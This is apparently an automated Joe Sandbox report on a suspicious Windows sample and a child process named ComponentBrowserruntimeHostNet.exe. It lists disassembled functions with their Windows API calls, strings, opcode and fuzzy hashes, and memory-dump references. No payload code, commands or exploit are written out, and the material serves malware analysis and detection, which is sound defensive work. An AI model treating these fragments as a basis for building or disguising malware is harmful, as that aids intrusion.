Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 7081f956f699d334f06aef35e5d80c956d26517b7cf0116f445ff74db6241872
Instruction ID: 9cd7f3fdf389b309501e32adbc1ae3ebc3fae792adbc9a94d6860a2cef840c95
Opcode Fuzzy Hash: 7081f956f699d334f06aef35e5d80c956d26517b7cf0116f445ff74db6241872
Instruction Fuzzy Hash: 8941D6719006699BCB119F688C59AEEBBF8EF05310F00446AFD45F7242DB70AE448BA4

Function 00BDC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BD91E0,?,00000000,?,00000001,?,?,00000001,00BD91E0,?), ref: 00BDC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BD6CBE,?), ref: 00BDCA70
__freea.LIBCMT ref: 00BDCA79

Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 91fcf5968c1621282f47a7f4d824e6efe778691554bf51ed2cc7031db7a32b19
Instruction ID: a7a1bf3a0b7b0bb5e13df6cf89ed9ec6ca5a425faa0737c6c500f0472bbe0d78
Opcode Fuzzy Hash: 91fcf5968c1621282f47a7f4d824e6efe778691554bf51ed2cc7031db7a32b19
Instruction Fuzzy Hash: ED31A27190021AABDB25DF64CC85DBEBBE5EF01710B1442A9FC04EB294EB35DD50CB90

Function 00BCA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BCA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00BCA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BCA683
ReleaseDC.USER32(00000000,00000000), ref: 00BCA691

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f4a72d023f4b4d8a623d6c9464e1374ba4fb1fd88ed712c4625983d34990eb23
Instruction ID: 96ab336b7e9b04e92707d0281c9ea22959b69cbf15e4d366ad9220c7360e3d82
Opcode Fuzzy Hash: f4a72d023f4b4d8a623d6c9464e1374ba4fb1fd88ed712c4625983d34990eb23
Instruction Fuzzy Hash: E7E0EC31942761A7D7615B60BD0DBDE3ED8BB0AB56F018151FA05A7290DB6486008BA1

Function 00BCA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00BCA699: GetDC.USER32(00000000), ref: 00BCA69D
Part of subcall function 00BCA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BCA6A8
Part of subcall function 00BCA699: ReleaseDC.USER32(00000000,00000000), ref: 00BCA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00BCA83C

Part of subcall function 00BCAAC9: GetDC.USER32(00000000), ref: 00BCAAD2
Part of subcall function 00BCAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00BCAB01
Part of subcall function 00BCAAC9: ReleaseDC.USER32(00000000,?), ref: 00BCAB99

Strings

(, xrefs: 00BCA9AA

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 6ac601fd595a322c83a1a36210d3a1a885f8bd5d80c8f974d82f67d7dfab0129
Instruction ID: 8a6ae23da7aaf7d52f5790a55962db0dea58ded85f68794dbb85f69a2836508f
Opcode Fuzzy Hash: 6ac601fd595a322c83a1a36210d3a1a885f8bd5d80c8f974d82f67d7dfab0129
Instruction Fuzzy Hash: DA91E071608394AFD610DF25D888E2BBBE8FF89704F00495EF59AD7260DB70A945CF62

Function 00BB75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB75E3

Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0

Part of subcall function 00BBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BBA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB777F

Part of subcall function 00BBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA501
Part of subcall function 00BBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA532

Strings

:, xrefs: 00BB7654

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 66ebd229680287bef95acedfdd0ff9a2fecf88b60f1e786d4c02a4f0f625060f
Instruction ID: 602dbfc73e42d6630d6d785e3002b0abafb3a4c6c5dd330f344a677c20ec17a4
Opcode Fuzzy Hash: 66ebd229680287bef95acedfdd0ff9a2fecf88b60f1e786d4c02a4f0f625060f
Instruction Fuzzy Hash: 34414171841258ABEB25EB65CD95EFE73F8EF91300F0040D6A605A6092DFB45F85CB61

Function 00BCB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BCB4E3
_wcslen.LIBCMT ref: 00BCB4FE

Strings

}, xrefs: 00BCB4D6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: f1dc2adc8308bb137a6a4fe4a44c4c00d064b4ee206f1d99d49d0dcf85a57cec
Instruction ID: 1bd445d78aaa765874e0eb63eed7d94c556af5814ee1d8d28b1c77d3ab7fd8c3
Opcode Fuzzy Hash: f1dc2adc8308bb137a6a4fe4a44c4c00d064b4ee206f1d99d49d0dcf85a57cec
Instruction Fuzzy Hash: EA21AE7290430A5AD731AA64D856F6FB3ECDFA1750F1404AEF680C3242FB65DD4883A2

Function 00BBF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BBF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BBF2E4
Part of subcall function 00BBF2C5: GetProcAddress.KERNEL32(00BF81C8,CryptUnprotectMemory), ref: 00BBF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00BBF33E), ref: 00BBF3D2

Strings

CryptUnprotectMemory failed, xrefs: 00BBF3CA
CryptProtectMemory failed, xrefs: 00BBF389

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 17f1f1e6dd86cb48c21e19cc4ac9e9ca355152f0d3418ee098e94426516fd9f8
Instruction ID: 18cf154f8a13ea5be0d40f16d7182fea74493971bdfb5eb5f33c2ea5429f6c30
Opcode Fuzzy Hash: 17f1f1e6dd86cb48c21e19cc4ac9e9ca355152f0d3418ee098e94426516fd9f8
Instruction Fuzzy Hash: 4011033260026AABDF119F21DC85ABE3BD5EF04B20B0042E6FC416B251DEB49E418A98

Function 00BBB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BBB9B8

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

Strings

%c:\, xrefs: 00BBB9AE

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 0b9538aaab741e36302507bf60a10a87bf4dc8f159abd32004f6dc22fa2a17f8
Instruction ID: ba00b9f5dd484a74b0f9592be5c09d5bbf70607c6d27df7ab8b86f02ff7bb88a
Opcode Fuzzy Hash: 0b9538aaab741e36302507bf60a10a87bf4dc8f159abd32004f6dc22fa2a17f8
Instruction Fuzzy Hash: 7B01D2675003116A9A30AB698C86DBBE7ECEE92770B40449BF584D6182FBF0D84082B1

Function 00BC101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00BC1160,?,00000000,00000000), ref: 00BC1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00BC108A

Part of subcall function 00BB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB6C54

Strings

CreateThread failed, xrefs: 00BC104F

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 1e2a3ab5fda4057ed384c8e881daa1649d8a61f976baf57ba482bb231ab7dbd7
Instruction ID: 657636f02c7cb9f69fdf5d5951da4da4554cd132cd8e7b25e7f628ccec60a341
Opcode Fuzzy Hash: 1e2a3ab5fda4057ed384c8e881daa1649d8a61f976baf57ba482bb231ab7dbd7
Instruction Fuzzy Hash: 1B01DBB53443496FD3305E789C51F7673D8EB41751F1008AEF64667281CEE1AC858624

Function 00BB1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00BBE2E8: _swprintf.LIBCMT ref: 00BBE30E
Part of subcall function 00BBE2E8: _strlen.LIBCMT ref: 00BBE32F
Part of subcall function 00BBE2E8: SetDlgItemTextW.USER32(?,00BEE274,?), ref: 00BBE38F
Part of subcall function 00BBE2E8: GetWindowRect.USER32(?,?), ref: 00BBE3C9
Part of subcall function 00BBE2E8: GetClientRect.USER32(?,?), ref: 00BBE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370

Strings

0, xrefs: 00BB1319

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: cce4a9f15b3f6afab894f6e2d8e70aae603b3ee372dd1d5f859264cefbb8c39e
Instruction ID: 184d149ada306ac04a52f883ea6e921c990a72f149dd299c2876d614e005b491
Opcode Fuzzy Hash: cce4a9f15b3f6afab894f6e2d8e70aae603b3ee372dd1d5f859264cefbb8c39e
Instruction Fuzzy Hash: ECF08C3010428CBBDF150F68881DBFE3BE8EF02348F448994FD44515A1EBB5C994AB28

Function 00BC0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00BC1206,?), ref: 00BC0FEA
GetLastError.KERNEL32(?), ref: 00BC0FF6

Part of subcall function 00BB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BC0FFF

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 991cf95970a5915a7f7bd17d7d34854fc81e1aff35a769efaf440079bc86483e
Instruction ID: 8dc6682411a1a3a51be58591e63fd81e7d032e6454222f589229a94102c21179
Opcode Fuzzy Hash: 991cf95970a5915a7f7bd17d7d34854fc81e1aff35a769efaf440079bc86483e
Instruction Fuzzy Hash: 12D02B3250816077C61033395C09EBE3D84CB12731B600F94F139672F3CF244D814695

Function 00BBE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00BBDA55,?), ref: 00BBE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BBDA55,?), ref: 00BBE2B1

Strings

RTL, xrefs: 00BBE2AB

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 1ed96d8722783932835121511d19e3a405b759837e962f56224913b56d9d5afd
Instruction ID: bb53bf8b3c81617eea0614aba835d040dc8c734660fac14885ab30a30e728435
Opcode Fuzzy Hash: 1ed96d8722783932835121511d19e3a405b759837e962f56224913b56d9d5afd
Instruction Fuzzy Hash: 4EC0123124079066EA3067756C8DB9B6AD89B00F21F09049CB281EF2E2DAE5C98086A0

Analysis Process: ComponentBrowserruntimeHostNet.exePID: 5296, Parent PID: 6908COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAA0D47 Relevance: 1.5, Strings: 1, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5[_H, xrefs: 00007FFD9BAA0DF3

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: c2cdd3b7d7f826cbb0058dd61ba7944d17528a75e31a19629cf8aafefcdef926
Instruction ID: 909a43b81ae2b14986249eebf42a8744ba1b848c22867ea552cbbb89f4c0f4fa
Opcode Fuzzy Hash: c2cdd3b7d7f826cbb0058dd61ba7944d17528a75e31a19629cf8aafefcdef926
Instruction Fuzzy Hash: AE910371A09A8D4FE799DB6888797A97FE2FF95310F4001BED049D72E6CBB82811C750

Function 00007FFD9BE9A071 Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNEL32 ref: 00007FFD9BE9A221

Memory Dump Source

Source File: 00000004.00000002.1770937204.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9be90000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: ffac51cbc4976fd0b17c79a6bf57812202fa5b0c1063ac73392f1c38442e8294
Instruction ID: 90767c882dd182ce1d504130d2801b832656a570a2f30549184d79106dbebaef
Opcode Fuzzy Hash: ffac51cbc4976fd0b17c79a6bf57812202fa5b0c1063ac73392f1c38442e8294
Instruction Fuzzy Hash: 7171A030619A8C8FDB68DF2888597F977E1FF59311F00427EE84EC7292CB75A9458B81

Function 00007FFD9BC01DBA Relevance: .7, Instructions: 747
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1769600921.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bc00000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926395d0c25bf100aa683f6cb8f64a1a18fbfaa54f511b0fb65a4892f9e2361f
Instruction ID: a14a495a7dd3c9e09f81ebeb2dde018f011eba4e105d4d265cb4b3878f575146
Opcode Fuzzy Hash: 926395d0c25bf100aa683f6cb8f64a1a18fbfaa54f511b0fb65a4892f9e2361f
Instruction Fuzzy Hash: BF528271A1DA594FDFA8EB58C8A5AA8B7F1FF68350F0401E9E04DC7292CA357D81CB41

Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70483c479748fef48de928f792627fde3059cadce1e3344f80f536751064c9b3
Instruction ID: cf97b313f1641ba2576b6c018af44bc799c11dabe81358f401bd68ce389fc506
Opcode Fuzzy Hash: 70483c479748fef48de928f792627fde3059cadce1e3344f80f536751064c9b3
Instruction Fuzzy Hash: B2415812B0C9590EE318F77CA4B9AF97781EF9933AB0405BBE44ECB1D7CD14A881C280

Function 00007FFD9BAA0910 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8b64b3668c4fd948b335103ad9814d0baead3758870f88a2b441810ece77ee
